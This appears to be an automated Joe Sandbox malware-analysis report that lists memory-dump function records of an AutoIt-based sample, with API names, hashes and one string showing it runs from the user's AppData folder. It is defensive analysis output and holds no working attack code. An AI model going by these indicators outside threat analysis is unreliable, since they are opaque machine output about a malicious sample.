                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _ctrlfp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 697997973-0
                                                                                                                                                                                                                    • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                                                                                                                                                                    • Instruction ID: 9ba8d70bf7c5a78f8813928a078decb1d3e3a6690f4d4a8ef3e27ba9526f10c3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8411C961D0C58781D7629A38904217FD371EF9AB80F684231FB9DAA7A5DF2FE940CB00
                                                                                                                                                                                                                    Function 00007FF656D2CF68 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2979156933-0
                                                                                                                                                                                                                    • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                                                                                                                                                                    • Instruction ID: d2bf5552120dad46d7e5032d041afae7bd5182d9af1c937a0326e502c7eb38dd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C21A532A0C78286E710CF26B84016A77A1FB88BD4F484735E99D93BA9DF7DD545C740
                                                                                                                                                                                                                    Function 00007FF656D5FA78 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                                                                                                    • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                                                                                                                                                                    • Instruction ID: 83730e26767795ee5f3cbeff4fa277b899f2812880954057deb9f98d9b6ce4d1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC21C7B6E04741DEEB00DF75D84459C77B0F748B88B444E26EA58A7B18DF78D654CB40
                                                                                                                                                                                                                    Function 00007FF656D24B28 Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1352324309-0
                                                                                                                                                                                                                    • Opcode ID: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                                                                                                                                                                    • Instruction ID: 0dc741526c728dc706e80944ce8433ef4eb04c4baafa5694984ea4e8a3cf8719
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1111F6271855282E7208F25E89437E33A0FB88B88F584735CA4D9BA54CF7ED584DB50
                                                                                                                                                                                                                    Function 00007FF656CEB778 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$abort
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1447195878-0
                                                                                                                                                                                                                    • Opcode ID: 5c68b7f432a971f9c1a5a37c5612d4f4cb9c7d627adb850da760d9ecfffa7c81
                                                                                                                                                                                                                    • Instruction ID: eb686164f611e7a3add3b7db74ac1d49e9e9264d4503a31679583c43fa79a1b2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c68b7f432a971f9c1a5a37c5612d4f4cb9c7d627adb850da760d9ecfffa7c81
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD018C64B0D24342FA5AA771A65713821715F447D0F5C0A38D91EA6BE6DD2EBC48C620
                                                                                                                                                                                                                    Function 00007FF656D29260 Relevance: 6.0, APIs: 4, Instructions: 37sleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2875609808-0
                                                                                                                                                                                                                    • Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                                                                                                                                                    • Instruction ID: ef7f07712776b70f47e32501276f689e71e5bf7f3350661babf722608f6926f7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C401F560A0CB8642EA265B36D84017BB360BF99741F8C0736E98FB5560CF2EE4D6C600
                                                                                                                                                                                                                    Function 00007FF656D6072C Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1539411459-0
                                                                                                                                                                                                                    • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                                                                                                                                                                    • Instruction ID: c7deb8cddfe9caca1adb396872da30f49fd5e638390bed7a6b6d4e0795dff73d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4501B135A2879183E7008B16F9097297B60BB81BD4F1C0734DE5953BA1CF7EE881CB00
                                                                                                                                                                                                                    Function 00007FF656D1D4EC Relevance: 6.0, APIs: 4, Instructions: 24threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3974789173-0
                                                                                                                                                                                                                    • Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                                                                                                                                                    • Instruction ID: 13448c6b2244f8068e31127f7c6df1cc4388ecb0aa6dc0c55c245a1c96db3fb6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08F03962A5990282FB504F62E84577822A0EF59BC9F8C4B34C90EA2250EF7E99D9C340
                                                                                                                                                                                                                    Function 00007FF656D1326E Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                                                    • Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                                                                                                                                                    • Instruction ID: d8d3b49fc6697b01672cad853d01de015b65c49a1a5e07ae7ba01c45bcd4aec2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08E01260A0931286FA009F62A90C2383364AF49FC1F0A4B30CD0FA3B95DE7EA085C300
                                                                                                                                                                                                                    Function 00007FF656D13287 Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                                                    • Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                                                                                                                                                    • Instruction ID: af1cb6f41f4198c5e0d98d4f06976342f54264896df89ac0eee0b19e44e54f2d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E0B660B0975286FA04DF62E95C2383265AF49FD5F094A34CE1FA7B65DE7FA085C700
                                                                                                                                                                                                                    Function 00007FF656CECC78 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: gfffffff
                                                                                                                                                                                                                    • API String ID: 3215553584-1523873471
                                                                                                                                                                                                                    • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                                                                                                                                                                    • Instruction ID: 344e06997f2140a47affe9be14a8e5cb91812e4aff2ed5f22fbff7b4f7f07a75
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20914DA3B097C786EB228F29914237C6B75AB657D0F088131DBAD97395DE3EE911C301
                                                                                                                                                                                                                    Function 00007FF656D21D10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200comCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ContainedObject
                                                                                                                                                                                                                    • String ID: AutoIt3GUI$Container
                                                                                                                                                                                                                    • API String ID: 3565006973-3941886329
                                                                                                                                                                                                                    • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                                                                                                                                                                    • Instruction ID: 015e29786f08e0cfb73e08f78d53058fad8965ed2874b2591edb547dfac23f26
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC913772604B4682DB24DF29E8406AE73B4FB88B84F558636DF9D93724EF3AD545C340
                                                                                                                                                                                                                    Function 00007FF656CED0A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: e+000$gfff
                                                                                                                                                                                                                    • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                    • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                                                                                                                                                                    • Instruction ID: 27f06f452602fc51db48f249533f403442e46da8b1ab574b2d6842bdf6d24225
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70512BA2B187C346E7268F3599423696AB1EB91B90F4CD231D69CD7BD5CF2EE844C700
                                                                                                                                                                                                                    Function 00007FF656CEA09C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                                                                                                                                                                    • API String ID: 3307058713-2268073309
                                                                                                                                                                                                                    • Opcode ID: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                                                                                                                                                                    • Instruction ID: d91be9b2ecd2513606cb34d54a8ad4f42410558747c3b467719243b810aa0e1a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A418FB2A08A538AEB169FA5D8420B977B4FF44BD4B584131E90EA7755DE3EE881C340
                                                                                                                                                                                                                    Function 00007FF656D59E08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
